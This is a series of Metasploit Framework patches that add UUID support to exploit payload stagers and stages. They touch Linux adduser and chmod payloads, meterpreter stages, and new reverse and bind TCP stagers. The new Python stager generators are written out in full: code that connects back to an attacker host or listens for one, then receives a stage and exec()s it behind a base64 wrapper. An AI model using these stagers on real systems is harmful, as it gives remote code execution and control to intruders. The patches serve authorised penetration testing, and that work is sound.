-  def generate_stage
+  def generate_stage(opts={})
     cmd = (datastore['CMD'] || '') << "\x00"
     call = "\xe8" + [cmd.length].pack('V')
     payload =
diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb
index 01a18780df..064b5ca314 100644
--- a/modules/payloads/singles/linux/x86/adduser.rb
+++ b/modules/payloads/singles/linux/x86/adduser.rb
@@ -44,7 +44,7 @@ module Metasploit3
   #
   # Dynamically builds the adduser payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     user    = datastore['USER']  || 'metasploit'
     pass    = datastore['PASS']  || 'metasploit'
     shell   = datastore['SHELL'] || '/bin/sh'
diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb
index dca5193c63..6ed4ea11a0 100644
--- a/modules/payloads/singles/linux/x86/chmod.rb
+++ b/modules/payloads/singles/linux/x86/chmod.rb
@@ -34,7 +34,7 @@ module Metasploit3
   end
 
   # Dynamically generates chmod(FILE, MODE) + exit()
-  def generate_stage
+  def generate_stage(opts={})
     file    = datastore['FILE'] || '/etc/shadow'
     mode	= (datastore['MODE'] || "0666").oct
 
diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb
index 2ef0c9e84a..dcb8d3ce25 100644
--- a/modules/payloads/singles/linux/x86/exec.rb
+++ b/modules/payloads/singles/linux/x86/exec.rb
@@ -39,7 +39,7 @@ module Metasploit3
   #
   # Dynamically builds the exec payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     cmd     = datastore['CMD'] || ''
     payload =
       "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68" +
diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb
index 840fa68508..1a6ce1819b 100644
--- a/modules/payloads/singles/linux/x86/read_file.rb
+++ b/modules/payloads/singles/linux/x86/read_file.rb
@@ -30,7 +30,7 @@ module Metasploit3
       ], self.class)
   end
 
-  def generate_stage
+  def generate_stage(opts={})
     fd = datastore['FD']
 
     payload_data =<<-EOS
diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb
index 7658f6e3f6..7756c8f420 100644
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -44,7 +44,7 @@ module Metasploit3
   #
   # Dynamically builds the exec payload based on the user's options.
   #
-  def generate_stage
+  def generate_stage(opts={})
     bsd_x86_exec_payload
   end
 end
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
new file mode 100644
index 0000000000..92d7b005ea
--- /dev/null
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/linux/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 110
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Linux::BindTcp
+
+  def self.handler_type_alias
+    'bind_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Bind TCP Stager, sending UUID (Linux x86)',
+      'Description' => 'Listen for a connection, sending UUID (Linux x86)',
+      'Author'      => [ 'skape', 'egypt' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => true }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
new file mode 100644
index 0000000000..5c3657ec11
--- /dev/null
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/linux/reverse_tcp'
+
+module Metasploit4
+
+  CachedSize = 193
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Linux::ReverseTcp
+
+  def self.handler_type_alias
+    'reverse_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Reverse TCP Stager',
+      'Description' => 'Connect back to the attacker',
+      'Author'      => [ 'skape', 'egypt' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => { 'Payload' => '' }))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb
index 6540c6735e..c59304480d 100644
--- a/modules/payloads/stagers/windows/bind_tcp.rb
+++ b/modules/payloads/stagers/windows/bind_tcp.rb
@@ -17,16 +17,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager (Windows x86)',
-      'Description'   => 'Listen for a connection (Windows x86)',
-      'Author'        => ['hdm', 'skape', 'sf'],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => false }
-      ))
+      'Name'        => 'Bind TCP Stager (Windows x86)',
+      'Description' => 'Listen for a connection (Windows x86)',
+      'Author'      => ['hdm', 'skape', 'sf'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
   end
 
 end
diff --git a/modules/payloads/stagers/windows/bind_tcp_rc4.rb b/modules/payloads/stagers/windows/bind_tcp_rc4.rb
index b3cedca190..cd50c3b324 100644
--- a/modules/payloads/stagers/windows/bind_tcp_rc4.rb
+++ b/modules/payloads/stagers/windows/bind_tcp_rc4.rb
@@ -74,8 +74,8 @@ module Metasploit3
     ], self.class)
   end
 
-  def generate_stage
-    p = super
+  def generate_stage(opts={})
+    p = super(opts)
     m = OpenSSL::Digest.new('sha1')
     m.reset
     key = m.digest(datastore["RC4PASSWORD"] || "")
diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
new file mode 100644
index 0000000000..4a2a7cfbb0
--- /dev/null
+++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 318
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::BindTcp
+
+  def self.handler_type_alias
+    'bind_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Windows x86 Bind TCP Stager, sending UUID',
+      'Description' => 'Listen for a connection, send UUID (Windows x86)',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb
index 8df5d350b0..8fe18aabd6 100644
--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -17,16 +17,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Reverse TCP Stager',
-      'Description'   => 'Connect back to the attacker',
-      'Author'        => ['hdm', 'skape', 'sf'],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Convention'    => 'sockedi',
-      'Stager'        => { 'RequiresMidstager' => false }
-      ))
+      'Name'        => 'Reverse TCP Stager',
+      'Description' => 'Connect back to the attacker',
+      'Author'      => ['hdm', 'skape', 'sf'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
   end
 
 end
diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
index bf3822115a..6374045fac 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb
@@ -75,8 +75,8 @@ module Metasploit3
     ], self.class)
   end
 
-  def generate_stage
-    p = super
+  def generate_stage(opts={})
+    p = super(opts)
     m = OpenSSL::Digest.new('sha1')
     m.reset
     key = m.digest(datastore["RC4PASSWORD"] || "")
diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
index 354ce989e5..24d29b7e81 100644
--- a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb
@@ -83,7 +83,8 @@ module Metasploit3
     ], self.class)
   end
 
-  def generate_stage
+  def generate_stage(opts={})
+    p = super(opts)
     m = OpenSSL::Digest.new('sha1')
     m.reset
     key = m.digest(datastore["RC4PASSWORD"] || "")
diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
new file mode 100644
index 0000000000..a1d7afa7f3
--- /dev/null
+++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/windows/reverse_tcp'
+
+module Metasploit4
+
+  CachedSize = 314
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::ReverseTcp
+
+  def self.handler_type_alias
+    'reverse_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Reverse TCP Stager with UUID support',
+      'Description' => 'Connect back to the attacker, send UUID first',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Convention'  => 'sockedi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
new file mode 100644
index 0000000000..968dcd0370
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/windows/x64/bind_tcp'
+
+module Metasploit4
+
+  CachedSize = 520
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::BindTcp_x64
+
+  def self.handler_type_alias
+    'bind_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Windows x64 Bind TCP Stager, sending UUID',
+      'Description' => 'Listen for a connection, send UUID (Windows x64)',
+      'Author'      => [ 'sf' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86_64,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Convention'  => 'sockrdi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
index 1715f2eba9..fa311123ee 100644
--- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
@@ -16,16 +16,16 @@ module Metasploit4
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows x64 Reverse TCP Stager',
-      'Description'   => 'Connect back to the attacker (Windows x64)',
-      'Author'        => [ 'sf' ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86_64,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Convention'    => 'sockrdi',
-      'Stager'        => { 'RequiresMidstager' => false }
-      ))
+      'Name'        => 'Windows x64 Reverse TCP Stager',
+      'Description' => 'Connect back to the attacker (Windows x64)',
+      'Author'      => [ 'sf' ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86_64,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Convention'  => 'sockrdi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
   end
 
 end
diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
new file mode 100644
index 0000000000..5c03b40aa8
--- /dev/null
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/windows/x64/reverse_tcp'
+
+module Metasploit4
+
+  CachedSize = 478
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Windows::ReverseTcp_x64
+
+  def self.handler_type_alias
+    'reverse_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Windows x64 Reverse TCP Stager with UUID support',
+      'Description' => 'Connect back to the attacker, send UUID first (Windows x64)',
+      'Author'      => ['OJ Reeves'],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => ARCH_X86_64,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Convention'  => 'sockrdi',
+      'Stager'      => { 'RequiresMidstager' => false }
+    ))
+  end
+
+  #
+  # Override the uuid function and opt-in for sending the
+  # UUID in the stage.
+  #
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb
index 5c42790620..065435cd37 100644
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -36,7 +36,8 @@ module Metasploit3
   # Override the Payload::Dalvik version so we can load a prebuilt jar to be
   # used as the final stage
   #
-  def generate_stage
+  def generate_stage(opts={})
+    # TODO: wire the UUID into the stage
     clazz = 'androidpayload.stage.Meterpreter'
     file = File.join(Msf::Config.data_directory, "android", "metstage.jar")
     metstage = File.open(file, "rb") {|f| f.read(f.stat.size) }
diff --git a/modules/payloads/stages/android/shell.rb b/modules/payloads/stages/android/shell.rb
index 0d04451c27..60eaf61f11 100644
--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@@ -34,7 +34,7 @@ module Metasploit3
   # Override the {Payload::Dalvik} version so we can load a prebuilt jar
   # to be used as the final stage
   #
-  def generate_stage
+  def generate_stage(opts={})
     clazz = 'androidpayload.stage.Shell'
     file = File.join(Msf::Config.data_directory, "android", "shell.jar")
     shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb
index 2fe63d9b42..dfa263ef0e 100644
--- a/modules/payloads/stages/java/meterpreter.rb
+++ b/modules/payloads/stages/java/meterpreter.rb
@@ -53,12 +53,13 @@ module Metasploit3
   # Override the Payload::Java version so we can load a prebuilt jar to be
   # used as the final stage; calls super to get the intermediate stager.
   #
-  def generate_stage
+  def generate_stage(opts={})
+    # TODO: wire the UUID into the stage
     met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
 
     # All of the dendencies to create a jar loader, followed by the length
     # of the jar and the jar itself.
-    super + [met.length].pack("N") + met
+    super(opts) + [met.length].pack("N") + met
   end
 
 end
diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb
index 4590895cd5..8056077829 100644
--- a/modules/payloads/stages/linux/x86/meterpreter.rb
+++ b/modules/payloads/stages/linux/x86/meterpreter.rb
@@ -142,9 +142,9 @@ module Metasploit3
 
   end
 
-  def generate_stage
+  def generate_stage(opts={})
     meterpreter = generate_meterpreter
-    config = generate_config
+    config = generate_config(opts)
     meterpreter + config
   end
 
diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb
index 6da688c80e..3e9bb5a785 100644
--- a/modules/payloads/stages/osx/armle/execute.rb
+++ b/modules/payloads/stages/osx/armle/execute.rb
@@ -144,8 +144,8 @@ module Metasploit3
       ], self.class)
   end
 
-  def generate_stage
-    data = super
+  def generate_stage(opts={})
+    data = super(opts)
 
     begin
       print_status("Reading executable file #{datastore['PEXEC']}...")
diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index 1f66f8a851..a057c695d8 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -23,12 +23,23 @@ module Metasploit3
       'Session'       => Msf::Sessions::Meterpreter_Php_Php))
   end
 
-  def generate_stage
+  def generate_stage(opts={})
     file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
 
     met = File.open(file, "rb") {|f|
       f.read(f.stat.size)
     }
+
+    unless opts[:uuid]
+      uuid = Msf::Payload::UUID.new(
+        platform: 'php',
+        arch:     ARCH_PHP
+      )
+    end
+
+    bytes = uuid.to_raw.map { |c| '\x%.2x' % c }.join('')
+    met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
+
     #met.gsub!(/#.*?$/, '')
     #met = Rex::Text.compress(met)
     met
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index a4a642a663..21bf8cf9ea 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -26,7 +26,7 @@ module Metasploit3
     ], self.class)
   end
 
-  def generate_stage
+  def generate_stage(opts={})
     file = ::File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.py")
 
     met = ::File.open(file, "rb") {|f|
@@ -37,6 +37,16 @@ module Metasploit3
       met = met.sub("DEBUGGING = False", "DEBUGGING = True")
     end
 
+    unless opts[:uuid]
+      uuid = Msf::Payload::UUID.new(
+        platform: 'python',
+        arch:     ARCH_PYTHON
+      )
+    end
+
+    bytes = uuid.to_raw.map { |c| '\x%.2x' % c }.join('')
+    met = met.sub("PAYLOAD_UUID = \"\"", "PAYLOAD_UUID = \"#{bytes}\"")
+
     met
   end
 end
diff --git a/modules/payloads/stages/windows/meterpreter.rb b/modules/payloads/stages/windows/meterpreter.rb
index 19a18983db..61c9dea629 100644
--- a/modules/payloads/stages/windows/meterpreter.rb
+++ b/modules/payloads/stages/windows/meterpreter.rb
@@ -38,20 +38,20 @@ module Metasploit4
 
   def generate_config(opts={})
     unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new({
-        :platform => 'windows',
-        :arch     => ARCH_X86
-      })
+      opts[:uuid] = Msf::Payload::UUID.new(
+        platform: 'windows',
+        arch:     ARCH_X86
+      )
     end
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
-      :arch       => opts[:uuid].arch,
-      :exitfunk   => datastore['EXITFUNC'],
-      :expiration => datastore['SessionExpirationTimeout'].to_i,
-      :uuid       => opts[:uuid],
-      :transports => [transport_config(opts)],
-      :extensions => []
+      arch:       opts[:uuid].arch,
+      exitfunk:   datastore['EXITFUNC'],
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)],
+      extensions: []
     }
 
     # create the configuration instance based off the parameters
diff --git a/modules/payloads/stages/windows/x64/meterpreter.rb b/modules/payloads/stages/windows/x64/meterpreter.rb
index e2c0acf9b0..d72041d837 100644
--- a/modules/payloads/stages/windows/x64/meterpreter.rb
+++ b/modules/payloads/stages/windows/x64/meterpreter.rb
@@ -38,20 +38,20 @@ module Metasploit4
 
   def generate_config(opts={})
     unless opts[:uuid]
-      opts[:uuid] = Msf::Payload::UUID.new({
-        :platform => 'windows',
-        :arch     => ARCH_X64
-      })
+      opts[:uuid] = Msf::Payload::UUID.new(
+        platform: 'windows',
+        arch:     ARCH_X64
+      )
     end
 
     # create the configuration block, which for staged connections is really simple.
     config_opts = {
-      :arch       => opts[:uuid].arch,
-      :exitfunk   => datastore['EXITFUNC'],
-      :expiration => datastore['SessionExpirationTimeout'].to_i,
-      :uuid       => opts[:uuid],
-      :transports => [transport_config(opts)],
-      :extensions => []
+      arch:       opts[:uuid].arch,
+      exitfunk:   datastore['EXITFUNC'],
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)],
+      extensions: []
     }
 
     # create the configuration instance based off the parameters

From 4488a5e634867f8c30992ea906d9ebbef2872a6c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 14:29:42 +1000
Subject: [PATCH 0103/1013] Add uuid support to python, and rework
 stages/stagers

---
 lib/msf/core/payload/python.rb                |  6 ++
 lib/msf/core/payload/python/bind_tcp.rb       | 72 +++++++++++++++++++
 lib/msf/core/payload/python/reverse_tcp.rb    | 70 ++++++++++++++++++
 lib/msf/core/payload/python/send_uuid.rb      | 36 ++++++++++
 .../ui/console/command_dispatcher/core.rb     |  3 +-
 modules/payloads/stagers/python/bind_tcp.rb   | 47 ++++--------
 .../payloads/stagers/python/bind_tcp_uuid.rb  | 43 +++++++++++
 .../payloads/stagers/python/reverse_tcp.rb    | 46 ++++--------
 .../stagers/python/reverse_tcp_uuid.rb        | 42 +++++++++++
 modules/payloads/stages/php/meterpreter.rb    |  2 +-
 modules/payloads/stages/python/meterpreter.rb | 12 ++--
 11 files changed, 300 insertions(+), 79 deletions(-)
 create mode 100644 lib/msf/core/payload/python.rb
 create mode 100644 lib/msf/core/payload/python/bind_tcp.rb
 create mode 100644 lib/msf/core/payload/python/reverse_tcp.rb
 create mode 100644 lib/msf/core/payload/python/send_uuid.rb
 create mode 100644 modules/payloads/stagers/python/bind_tcp_uuid.rb
 create mode 100644 modules/payloads/stagers/python/reverse_tcp_uuid.rb

diff --git a/lib/msf/core/payload/python.rb b/lib/msf/core/payload/python.rb
new file mode 100644
index 0000000000..383b3694a9
--- /dev/null
+++ b/lib/msf/core/payload/python.rb
@@ -0,0 +1,6 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Python
+
+end
diff --git a/lib/msf/core/payload/python/bind_tcp.rb b/lib/msf/core/payload/python/bind_tcp.rb
new file mode 100644
index 0000000000..ca9733aa20
--- /dev/null
+++ b/lib/msf/core/payload/python/bind_tcp.rb
@@ -0,0 +1,72 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/python/send_uuid'
+
+module Msf
+
+###
+#
+# Complex bind_tcp payload generation for Python
+#
+###
+
+module Payload::Python::BindTcp
+
+  include Msf::Payload::Python::SendUUID
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port: datastore['LPORT'],
+      host: datastore['LHOST']
+    }
+
+    generate_bind_tcp(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_bind_tcp(opts)
+  end
+
+  def generate_bind_tcp(opts={})
+    # Set up the socket
+    cmd  = "import socket,struct\n"
+    cmd << "b=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "b.bind(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "b.listen(1)\n"
+    cmd << "s,a=b.accept()\n"
+    cmd << py_send_uuid if include_send_uuid
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    b64_stub
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+
+
diff --git a/lib/msf/core/payload/python/reverse_tcp.rb b/lib/msf/core/payload/python/reverse_tcp.rb
new file mode 100644
index 0000000000..1f263f9003
--- /dev/null
+++ b/lib/msf/core/payload/python/reverse_tcp.rb
@@ -0,0 +1,70 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/python/send_uuid'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for Python
+#
+###
+
+module Payload::Python::ReverseTcp
+
+  include Msf::Payload::Python::SendUUID
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count: datastore['ReverseConnectRetries'],
+    }
+
+    generate_reverse_tcp(conf)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_tcp(opts)
+  end
+
+  def generate_reverse_tcp(opts={})
+    # Set up the socket
+    cmd  = "import socket,struct\n"
+    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << py_send_uuid if include_send_uuid
+    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+    cmd << "d=s.recv(l)\n"
+    cmd << "while len(d)<l:\n"
+    cmd << "\td+=s.recv(l-len(d))\n"
+    cmd << "exec(d,{'s':s})\n"
+
+    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+    b64_stub  = "import base64,sys;exec(base64.b64decode("
+    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
+    b64_stub << Rex::Text.encode_base64(cmd)
+    b64_stub << "')))"
+    b64_stub
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/python/send_uuid.rb b/lib/msf/core/payload/python/send_uuid.rb
new file mode 100644
index 0000000000..cd61745084
--- /dev/null
+++ b/lib/msf/core/payload/python/send_uuid.rb
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/python'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for Python payloads
+#
+###
+
+module Payload::Python::SendUUID
+
+  #
+  # Generate python code that writes the UUID to the socket.
+  #
+  def py_send_uuid(opts={})
+    sock_var = opts[:sock_var] || 's'
+
+    uuid = opts[:uuid] || Msf::Payload::UUID.new(
+      platform: 'python',
+      arch:     ARCH_PYTHON
+    )
+
+    uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
+
+    "#{sock_var}.send(\"#{uuid_raw}\")\n"
+  end
+
+end
+
+end
+
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 3d78b292e3..654b44c5ec 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -52,6 +52,7 @@ class Console::CommandDispatcher::Core
       "machine_id" => "Get the MSF ID of the machine attached to the session",
       "quit"       => "Terminate the meterpreter session",
       "resource"   => "Run the commands stored in a file",
+      "uuid"       => "Get the UUID for the current session",
       "read"       => "Reads data from a channel",
       "run"        => "Executes a meterpreter script or Post module",
